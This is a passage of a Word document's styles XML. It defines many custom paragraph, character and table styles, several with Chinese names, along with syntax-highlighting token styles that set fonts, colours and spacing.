    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="139">
    <w:name w:val="paragraph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40">
    <w:name w:val="正文1"/>
    <w:autoRedefine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41">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="142">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="143">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="144">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="145">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="146">
    <w:name w:val="行内代码"/>
    <w:basedOn w:val="47"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="24"/>
      <w:shd w:val="pct5" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="147">
    <w:name w:val="Body A"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000"/>
      <w:lang w:val="zh-TW" w:eastAsia="zh-TW" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="148">
    <w:name w:val="Header &amp; Footer"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pP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49">
    <w:name w:val="15"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="150">
    <w:name w:val="16"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="151">
    <w:name w:val="Table Normal"/>
    <w:autoRedefine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2">
    <w:name w:val="ne-p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53">
    <w:name w:val="ne-text"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="154">
    <w:name w:val="网格型1"/>
    <w:basedOn w:val="3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5">
    <w:name w:val="md-end-block"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="156">
    <w:name w:val="md-plain"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="157">
    <w:name w:val="Figure with Caption"/>
    <w:basedOn w:val="79"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="158">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="159">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="160">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="161">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="162">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="163">
    <w:name w:val="pl-cce"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="164">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="165">
    <w:name w:val="样式24"/>
    <w:basedOn w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="432"/>
        <w:tab w:val="left" w:pos="576"/>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="166">
    <w:name w:val="Code Block"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="424242"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="167">
    <w:name w:val="网格表 4 - 着色 11"/>
    <w:basedOn w:val="34"/>
    <w:autoRedefine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paragraph" w:customStyle="1" w:styleId="168">
    <w:name w:val="Source Code Language"/>
    <w:basedOn w:val="11"/>
    <w:next w:val="83"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="D99594"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="169">
    <w:name w:val="Code"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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EEECE1" w:themeFill="background2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman (Body CS)"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="170">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="880000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="171">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="BC7A00"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="172">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="902000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="173">
    <w:name w:val="md-softbreak"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="174">
    <w:name w:val="p-name"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="175">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="176">
    <w:name w:val="p1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="menlo" w:hAnsi="menlo" w:eastAsia="menlo"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="177">
    <w:name w:val="s1"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="178">
    <w:name w:val="Internet 链接"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="179">
    <w:name w:val="预格式化的文本"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="DejaVu Sans Mono" w:cs="Liberation Mono"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="180">
    <w:name w:val="段落文字"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="181">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="182">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="183">
    <w:name w:val="表格内容"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressLineNumbers/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="184">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:semiHidden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85">
    <w:name w:val="md-link"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="186">
    <w:name w:val="content-right_8zs40"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="187">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="188">
    <w:name w:val="安恒信息--标题 4"/>
    <w:basedOn w:val="5"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
        <w:tab w:val="left" w:pos="864"/>
        <w:tab w:val="left" w:pos="907"/>
        <w:tab w:val="clear" w:pos="1021"/>
      </w:tabs>
      <w:spacing w:after="156"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="189">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="36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90">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="191">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="192">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1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/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="193">
    <w:name w:val="xway正文"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="194">
    <w:name w:val="Paragraph Text Body"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:bidi w:val="0"/>
      <w:spacing w:before="240" w:after="120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5">
    <w:name w:val="Source Text"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Liberation Mono"/>
      <w:color w:val="BB002F"/>
      <w:bdr w:val="single" w:color="EEC5E1" w:sz="2" w:space="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFF8E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="196">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="B2B2B2" w:sz="2" w:space="1"/>
        <w:left w:val="single" w:color="B2B2B2" w:sz="2" w:space="1"/>
        <w:bottom w:val="single" w:color="B2B2B2" w:sz="2" w:space="1"/>
        <w:right w:val="single" w:color="B2B2B2" w:sz="2" w:space="1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:fill="EEEEEE"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="240" w:after="240"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Liberation Mono"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="197">
    <w:name w:val="_Style 23"/>
    <w:autoRedefine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98">
    <w:name w:val="标书正文"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="199">
    <w:name w:val="强调1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="200">
    <w:name w:val="_Style 10"/>
    <w:basedOn w:val="151"/>
    <w:autoRedefine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201">
    <w:name w:val="el-breadcrumb__inner"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="202">
    <w:name w:val="el-breadcrumb__separator"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="203">
    <w:name w:val="part"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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lang w:val="zh-CN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="204">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="205">
    <w:name w:val="Table"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed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6">
    <w:name w:val="一级标题"/>
    <w:basedOn w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="207">
    <w:name w:val="标题（二级）"/>
    <w:basedOn w:val="50"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="208">
    <w:name w:val="q-popover__reference"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="209">
    <w:name w:val="top_prodname"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="210">
    <w:name w:val="al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11">
    <w:name w:val="cm-keyword"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="212">
    <w:name w:val="cm-builtin"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="213">
    <w:name w:val="cm-variable"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="214">
    <w:name w:val="cm-variable-2"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="215">
    <w:name w:val="cm-operator"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="216">
    <w:name w:val="cm-atom"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="217">
    <w:name w:val="cm-tab-wrap-hack"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="218">
    <w:name w:val="cm-tab"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="219">
    <w:name w:val="cm-number"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="220">
    <w:name w:val="引用 字符"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="221"/>
    <w:autoRedefine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21">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="220"/>
    <w:autoRedefine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22">
    <w:name w:val="30正文样式"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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 w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="223">
    <w:name w:val="二标题_原子服务"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:line="560" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="楷体_GB2312"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="224">
    <w:name w:val="正文-默安"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Arial" w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="225">
    <w:name w:val="YX二级标题"/>
    <w:basedOn w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="Garamond" w:hAnsi="Garamond" w:eastAsia="黑体" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="226">
    <w:name w:val="YX一级标题"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="567" w:hanging="567"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="227">
    <w:name w:val="Strong Emphasis"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="228">
    <w:name w:val="common"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="229">
    <w:name w:val="ql-token"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="230">
    <w:name w:val="labelanswer"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
